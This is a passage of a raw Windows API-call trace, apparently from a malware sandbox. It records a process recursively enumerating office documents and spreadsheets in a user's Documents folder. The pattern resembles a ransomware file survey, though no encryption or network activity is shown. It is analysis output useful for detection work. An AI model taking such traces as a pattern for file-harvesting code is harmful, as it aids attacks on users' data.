ftLastWriteTime.dwLowDateTime=0x839eedf0, ftLastWriteTime.dwHighDateTime=0x1d57a9e, nFileSizeHigh=0x0, nFileSizeLow=0x161de, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="7e-9HIkeZJR.docx", cAlternateFileName="7E-9HI~1.DOC")) returned 1 [0071.815] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.815] lstrlenW (lpString="7e-9HIkeZJR.docx") returned 16 [0071.815] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x71cb40 [0071.815] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3c12500, ftCreationTime.dwHighDateTime=0x1d5bbfe, ftLastAccessTime.dwLowDateTime=0xf37bec90, ftLastAccessTime.dwHighDateTime=0x1d5735f, ftLastWriteTime.dwLowDateTime=0xf37bec90, ftLastWriteTime.dwHighDateTime=0x1d5735f, nFileSizeHigh=0x0, nFileSizeLow=0x29f6, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="7eErZYytfPAis.docx", cAlternateFileName="7EERZY~1.DOC")) returned 1 [0071.815] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.816] lstrlenW (lpString="7eErZYytfPAis.docx") returned 18 [0071.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xce) returned 0x71cc30 [0071.816] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2423800, ftCreationTime.dwHighDateTime=0x1d5a764, ftLastAccessTime.dwLowDateTime=0xffd4b4e0, ftLastAccessTime.dwHighDateTime=0x1d593a3, ftLastWriteTime.dwLowDateTime=0xffd4b4e0, ftLastWriteTime.dwHighDateTime=0x1d593a3, nFileSizeHigh=0x0, nFileSizeLow=0xe331, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="7Ll4HJLbk_I.pptx", cAlternateFileName="7LL4HJ~1.PPT")) returned 1 [0071.816] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.816] lstrlenW (lpString="7Ll4HJLbk_I.pptx") returned 16 [0071.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x71cd08 [0071.816] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38304f70, ftCreationTime.dwHighDateTime=0x1d58cbf, ftLastAccessTime.dwLowDateTime=0xc4921610, ftLastAccessTime.dwHighDateTime=0x1d5ae07, ftLastWriteTime.dwLowDateTime=0xc4921610, ftLastWriteTime.dwHighDateTime=0x1d5ae07, nFileSizeHigh=0x0, nFileSizeLow=0x18c21, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="8ZElhC9y.xlsx", cAlternateFileName="8ZELHC~1.XLS")) returned 1 [0071.816] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.816] lstrlenW (lpString="8ZElhC9y.xlsx") returned 13 [0071.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x71ec18 [0071.816] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0ff66e0, ftCreationTime.dwHighDateTime=0x1d5e218, ftLastAccessTime.dwLowDateTime=0x7561dd00, ftLastAccessTime.dwHighDateTime=0x1d55d12, ftLastWriteTime.dwLowDateTime=0x7561dd00, ftLastWriteTime.dwHighDateTime=0x1d55d12, nFileSizeHigh=0x0, nFileSizeLow=0xea68, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="9aM nKokL.docx", cAlternateFileName="9AMNKO~1.DOC")) returned 1 [0071.816] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.816] lstrlenW (lpString="9aM nKokL.docx") returned 14 [0071.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc6) returned 0x71ece8 [0071.816] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46c4a2f0, ftCreationTime.dwHighDateTime=0x1d5dda2, ftLastAccessTime.dwLowDateTime=0xd48af890, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xd48af890, ftLastWriteTime.dwHighDateTime=0x1d5d90c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Cg7H", cAlternateFileName="")) returned 1 [0071.816] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.817] lstrlenW (lpString="Cg7H") returned 4 [0071.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x719be0 [0071.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\*", lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46c4a2f0, ftCreationTime.dwHighDateTime=0x1d5dda2, ftLastAccessTime.dwLowDateTime=0xd48af890, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xd48af890, ftLastWriteTime.dwHighDateTime=0x1d5d90c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x709230 [0071.817] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46c4a2f0, ftCreationTime.dwHighDateTime=0x1d5dda2, ftLastAccessTime.dwLowDateTime=0xd48af890, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xd48af890, ftLastWriteTime.dwHighDateTime=0x1d5d90c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.817] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.817] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5931d70, ftCreationTime.dwHighDateTime=0x1d5d7d2, ftLastAccessTime.dwLowDateTime=0x25115fc0, ftLastAccessTime.dwHighDateTime=0x1d5e259, ftLastWriteTime.dwLowDateTime=0x25115fc0, ftLastWriteTime.dwHighDateTime=0x1d5e259, nFileSizeHigh=0x0, nFileSizeLow=0x17a1, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="3UyY1on2AU9_vHY-D0Js.pdf", cAlternateFileName="3UYY1O~1.PDF")) returned 1 [0071.817] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.817] lstrlenW (lpString="3UyY1on2AU9_vHY-D0Js.pdf") returned 24 [0071.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe4) returned 0x71edb8 [0071.817] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c94730, ftCreationTime.dwHighDateTime=0x1d5e4df, ftLastAccessTime.dwLowDateTime=0x62a5be30, ftLastAccessTime.dwHighDateTime=0x1d5dd27, ftLastWriteTime.dwLowDateTime=0x62a5be30, ftLastWriteTime.dwHighDateTime=0x1d5dd27, nFileSizeHigh=0x0, nFileSizeLow=0x3954, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="mUhfkzR.odt", cAlternateFileName="")) returned 1 [0071.817] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.817] lstrlenW (lpString="mUhfkzR.odt") returned 11 [0071.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x71cde0 [0071.817] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcac8e90, ftCreationTime.dwHighDateTime=0x1d5dbfe, ftLastAccessTime.dwLowDateTime=0x8882d4d0, ftLastAccessTime.dwHighDateTime=0x1d5dc69, ftLastWriteTime.dwLowDateTime=0x8882d4d0, ftLastWriteTime.dwHighDateTime=0x1d5dc69, nFileSizeHigh=0x0, nFileSizeLow=0xf98d, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="P2-Kx.pptx", cAlternateFileName="P2-KX~1.PPT")) returned 1 [0071.817] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.817] lstrlenW (lpString="P2-Kx.pptx") returned 10 [0071.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc8) returned 0x71eea8 [0071.818] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd644ff80, ftCreationTime.dwHighDateTime=0x1d5dfad, ftLastAccessTime.dwLowDateTime=0xa2c84a30, ftLastAccessTime.dwHighDateTime=0x1d5d9b9, ftLastWriteTime.dwLowDateTime=0xa2c84a30, ftLastWriteTime.dwHighDateTime=0x1d5d9b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="u-zzifvzTlp_CK", cAlternateFileName="U-ZZIF~1")) returned 1 [0071.818] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.818] lstrlenW (lpString="u-zzifvzTlp_CK") returned 14 [0071.818] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x719898 [0071.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\*", lpFindFileData=0x719898 | out: lpFindFileData=0x719898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd644ff80, ftCreationTime.dwHighDateTime=0x1d5dfad, ftLastAccessTime.dwLowDateTime=0xa2c84a30, ftLastAccessTime.dwHighDateTime=0x1d5d9b9, ftLastWriteTime.dwLowDateTime=0xa2c84a30, ftLastWriteTime.dwHighDateTime=0x1d5d9b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71ef78 [0071.818] FindNextFileW (in: hFindFile=0x71ef78, lpFindFileData=0x719898 | out: lpFindFileData=0x719898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd644ff80, ftCreationTime.dwHighDateTime=0x1d5dfad, ftLastAccessTime.dwLowDateTime=0xa2c84a30, ftLastAccessTime.dwHighDateTime=0x1d5d9b9, ftLastWriteTime.dwLowDateTime=0xa2c84a30, ftLastWriteTime.dwHighDateTime=0x1d5d9b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.818] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.818] FindNextFileW (in: hFindFile=0x71ef78, lpFindFileData=0x719898 | out: lpFindFileData=0x719898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f5ac10, ftCreationTime.dwHighDateTime=0x1d5db59, ftLastAccessTime.dwLowDateTime=0x192a2be0, ftLastAccessTime.dwHighDateTime=0x1d5d838, ftLastWriteTime.dwLowDateTime=0x192a2be0, ftLastWriteTime.dwHighDateTime=0x1d5d838, nFileSizeHigh=0x0, nFileSizeLow=0xd23a, dwReserved0=0x0, dwReserved1=0x0, cFileName="CWbgK3bmlvY0 u.pps", cAlternateFileName="CWBGK3~1.PPS")) returned 1 [0071.818] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.818] lstrlenW (lpString="CWbgK3bmlvY0 u.pps") returned 18 [0071.818] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf6) returned 0x719e38 [0071.818] FindNextFileW (in: hFindFile=0x71ef78, lpFindFileData=0x719898 | out: lpFindFileData=0x719898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b8b6890, ftCreationTime.dwHighDateTime=0x1d5e628, ftLastAccessTime.dwLowDateTime=0x58d64150, ftLastAccessTime.dwHighDateTime=0x1d5e73f, ftLastWriteTime.dwLowDateTime=0x58d64150, ftLastWriteTime.dwHighDateTime=0x1d5e73f, nFileSizeHigh=0x0, nFileSizeLow=0x1e10, dwReserved0=0x0, dwReserved1=0x0, cFileName="MRasqMwY.odt", cAlternateFileName="")) returned 1 [0071.818] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.818] lstrlenW (lpString="MRasqMwY.odt") returned 12 [0071.818] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea) returned 0x719f38 [0071.819] FindNextFileW (in: hFindFile=0x71ef78, lpFindFileData=0x719898 | out: lpFindFileData=0x719898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a766e10, ftCreationTime.dwHighDateTime=0x1d5dbd2, ftLastAccessTime.dwLowDateTime=0xf66bbb80, ftLastAccessTime.dwHighDateTime=0x1d5e608, ftLastWriteTime.dwLowDateTime=0xf66bbb80, ftLastWriteTime.dwHighDateTime=0x1d5e608, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYwLmRQpeBwfxW_093", cAlternateFileName="SYWLMR~1")) returned 1 [0071.819] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.819] lstrlenW (lpString="SYwLmRQpeBwfxW_093") returned 18 [0071.819] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x71a030 [0071.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a766e10, ftCreationTime.dwHighDateTime=0x1d5dbd2, ftLastAccessTime.dwLowDateTime=0xf66bbb80, ftLastAccessTime.dwHighDateTime=0x1d5e608, ftLastWriteTime.dwLowDateTime=0xf66bbb80, ftLastWriteTime.dwHighDateTime=0x1d5e608, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1412f48 [0071.819] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a766e10, ftCreationTime.dwHighDateTime=0x1d5dbd2, ftLastAccessTime.dwLowDateTime=0xf66bbb80, ftLastAccessTime.dwHighDateTime=0x1d5e608, ftLastWriteTime.dwLowDateTime=0xf66bbb80, ftLastWriteTime.dwHighDateTime=0x1d5e608, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.819] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.819] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2571ad90, ftCreationTime.dwHighDateTime=0x1d5e26c, ftLastAccessTime.dwLowDateTime=0x5a04ca20, ftLastAccessTime.dwHighDateTime=0x1d5d834, ftLastWriteTime.dwLowDateTime=0x5a04ca20, ftLastWriteTime.dwHighDateTime=0x1d5d834, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="39Tsq", cAlternateFileName="")) returned 1 [0071.819] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.819] lstrlenW (lpString="39Tsq") returned 5 [0071.819] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x71a288 [0071.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\*", lpFindFileData=0x71a288 | out: lpFindFileData=0x71a288*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2571ad90, ftCreationTime.dwHighDateTime=0x1d5e26c, ftLastAccessTime.dwLowDateTime=0x5a04ca20, ftLastAccessTime.dwHighDateTime=0x1d5d834, ftLastWriteTime.dwLowDateTime=0x5a04ca20, ftLastWriteTime.dwHighDateTime=0x1d5d834, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1412f88 [0071.819] FindNextFileW (in: hFindFile=0x1412f88, lpFindFileData=0x71a288 | out: lpFindFileData=0x71a288*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2571ad90, ftCreationTime.dwHighDateTime=0x1d5e26c, ftLastAccessTime.dwLowDateTime=0x5a04ca20, ftLastAccessTime.dwHighDateTime=0x1d5d834, ftLastWriteTime.dwLowDateTime=0x5a04ca20, ftLastWriteTime.dwHighDateTime=0x1d5d834, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.820] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.820] FindNextFileW (in: hFindFile=0x1412f88, lpFindFileData=0x71a288 | out: lpFindFileData=0x71a288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2bb6c00, ftCreationTime.dwHighDateTime=0x1d5e607, ftLastAccessTime.dwLowDateTime=0x893a5fa0, ftLastAccessTime.dwHighDateTime=0x1d5dc56, ftLastWriteTime.dwLowDateTime=0x893a5fa0, ftLastWriteTime.dwHighDateTime=0x1d5dc56, nFileSizeHigh=0x0, nFileSizeLow=0xed2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fw8StRX8z_Nc7vd2tH.pptx", cAlternateFileName="FW8STR~1.PPT")) returned 1 [0071.820] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.820] lstrlenW (lpString="Fw8StRX8z_Nc7vd2tH.pptx") returned 23 [0071.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x132) returned 0x71a4e0 [0071.820] FindNextFileW (in: hFindFile=0x1412f88, lpFindFileData=0x71a288 | out: lpFindFileData=0x71a288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7798490, ftCreationTime.dwHighDateTime=0x1d5e17f, ftLastAccessTime.dwLowDateTime=0x3760cc30, ftLastAccessTime.dwHighDateTime=0x1d5d8f7, ftLastWriteTime.dwLowDateTime=0x3760cc30, ftLastWriteTime.dwHighDateTime=0x1d5d8f7, nFileSizeHigh=0x0, nFileSizeLow=0x16293, dwReserved0=0x0, dwReserved1=0x0, cFileName="HFxkd.pptx", cAlternateFileName="HFXKD~1.PPT")) returned 1 [0071.820] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.820] lstrlenW (lpString="HFxkd.pptx") returned 10 [0071.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x118) returned 0x71a620 [0071.820] FindNextFileW (in: hFindFile=0x1412f88, lpFindFileData=0x71a288 | out: lpFindFileData=0x71a288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe641b0, ftCreationTime.dwHighDateTime=0x1d5e678, ftLastAccessTime.dwLowDateTime=0xdd5cb770, ftLastAccessTime.dwHighDateTime=0x1d5d95b, ftLastWriteTime.dwLowDateTime=0xdd5cb770, ftLastWriteTime.dwHighDateTime=0x1d5d95b, nFileSizeHigh=0x0, nFileSizeLow=0x16f49, dwReserved0=0x0, dwReserved1=0x0, cFileName="NH2vVFiCdhqIh.xlsx", cAlternateFileName="NH2VVF~1.XLS")) returned 1 [0071.820] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.820] lstrlenW (lpString="NH2vVFiCdhqIh.xlsx") returned 18 [0071.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x128) returned 0x71a740 [0071.820] FindNextFileW (in: hFindFile=0x1412f88, lpFindFileData=0x71a288 | out: lpFindFileData=0x71a288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c0ad70, ftCreationTime.dwHighDateTime=0x1d5e740, ftLastAccessTime.dwLowDateTime=0x2a7fe050, ftLastAccessTime.dwHighDateTime=0x1d5e522, ftLastWriteTime.dwLowDateTime=0x2a7fe050, ftLastWriteTime.dwHighDateTime=0x1d5e522, nFileSizeHigh=0x0, nFileSizeLow=0x1e51, dwReserved0=0x0, dwReserved1=0x0, cFileName="ti2 IpP48D2MDg.xls", cAlternateFileName="TI2IPP~1.XLS")) returned 1 [0071.820] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.820] lstrlenW (lpString="ti2 IpP48D2MDg.xls") returned 18 [0071.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x128) returned 0x71a870 [0071.820] FindNextFileW (in: hFindFile=0x1412f88, lpFindFileData=0x71a288 | out: lpFindFileData=0x71a288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ae91c70, ftCreationTime.dwHighDateTime=0x1d5d9a3, ftLastAccessTime.dwLowDateTime=0x24b21260, ftLastAccessTime.dwHighDateTime=0x1d5e572, ftLastWriteTime.dwLowDateTime=0x24b21260, ftLastWriteTime.dwHighDateTime=0x1d5e572, nFileSizeHigh=0x0, nFileSizeLow=0x1c4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="zRSwd2cPLtPKGm.csv", cAlternateFileName="ZRSWD2~1.CSV")) returned 1 [0071.820] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.821] lstrlenW (lpString="zRSwd2cPLtPKGm.csv") returned 18 [0071.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x128) returned 0x71a9a0 [0071.821] FindNextFileW (in: hFindFile=0x1412f88, lpFindFileData=0x71a288 | out: lpFindFileData=0x71a288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ae91c70, ftCreationTime.dwHighDateTime=0x1d5d9a3, ftLastAccessTime.dwLowDateTime=0x24b21260, ftLastAccessTime.dwHighDateTime=0x1d5e572, ftLastWriteTime.dwLowDateTime=0x24b21260, ftLastWriteTime.dwHighDateTime=0x1d5e572, nFileSizeHigh=0x0, nFileSizeLow=0x1c4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="zRSwd2cPLtPKGm.csv", cAlternateFileName="ZRSWD2~1.CSV")) returned 0 [0071.821] FindClose (in: hFindFile=0x1412f88 | out: hFindFile=0x1412f88) returned 1 [0071.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0071.821] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2e45760, ftCreationTime.dwHighDateTime=0x1d5e08e, ftLastAccessTime.dwLowDateTime=0x4626f1d0, ftLastAccessTime.dwHighDateTime=0x1d5e2d0, ftLastWriteTime.dwLowDateTime=0x4626f1d0, ftLastWriteTime.dwHighDateTime=0x1d5e2d0, nFileSizeHigh=0x0, nFileSizeLow=0x123e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xH3onikOGTYsP3Z9yC.pps", cAlternateFileName="6XH3ON~1.PPS")) returned 1 [0071.821] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.821] lstrlenW (lpString="6xH3onikOGTYsP3Z9yC.pps") returned 23 [0071.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x126) returned 0x71a288 [0071.821] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa266bd90, ftCreationTime.dwHighDateTime=0x1d5e780, ftLastAccessTime.dwLowDateTime=0xf713ed60, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0xf713ed60, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0xf53, dwReserved0=0x0, dwReserved1=0x0, cFileName="aLOXIX3c-.ots", cAlternateFileName="ALOXIX~1.OTS")) returned 1 [0071.821] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.821] lstrlenW (lpString="aLOXIX3c-.ots") returned 13 [0071.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x112) returned 0x71a3b8 [0071.821] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa266bd90, ftCreationTime.dwHighDateTime=0x1d5e780, ftLastAccessTime.dwLowDateTime=0xf713ed60, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0xf713ed60, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0xf53, dwReserved0=0x0, dwReserved1=0x0, cFileName="aLOXIX3c-.ots", cAlternateFileName="ALOXIX~1.OTS")) returned 0 [0071.821] FindClose (in: hFindFile=0x1412f48 | out: hFindFile=0x1412f48) returned 1 [0071.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.821] FindNextFileW (in: hFindFile=0x71ef78, lpFindFileData=0x719898 | out: lpFindFileData=0x719898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30c812b0, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0xcfa84de0, ftLastAccessTime.dwHighDateTime=0x1d5df02, ftLastWriteTime.dwLowDateTime=0xcfa84de0, ftLastWriteTime.dwHighDateTime=0x1d5df02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZMpMHpVtC4 chO8TI", cAlternateFileName="ZMPMHP~1")) returned 1 [0071.821] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.821] lstrlenW (lpString="ZMpMHpVtC4 chO8TI") returned 17 [0071.822] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x71a030 [0071.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30c812b0, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0xcfa84de0, ftLastAccessTime.dwHighDateTime=0x1d5df02, ftLastWriteTime.dwLowDateTime=0xcfa84de0, ftLastWriteTime.dwHighDateTime=0x1d5df02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1412f48 [0071.822] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30c812b0, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0xcfa84de0, ftLastAccessTime.dwHighDateTime=0x1d5df02, ftLastWriteTime.dwLowDateTime=0xcfa84de0, ftLastWriteTime.dwHighDateTime=0x1d5df02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.822] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.822] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e896f90, ftCreationTime.dwHighDateTime=0x1d5e0b9, ftLastAccessTime.dwLowDateTime=0x35c808f0, ftLastAccessTime.dwHighDateTime=0x1d5e78b, ftLastWriteTime.dwLowDateTime=0x35c808f0, 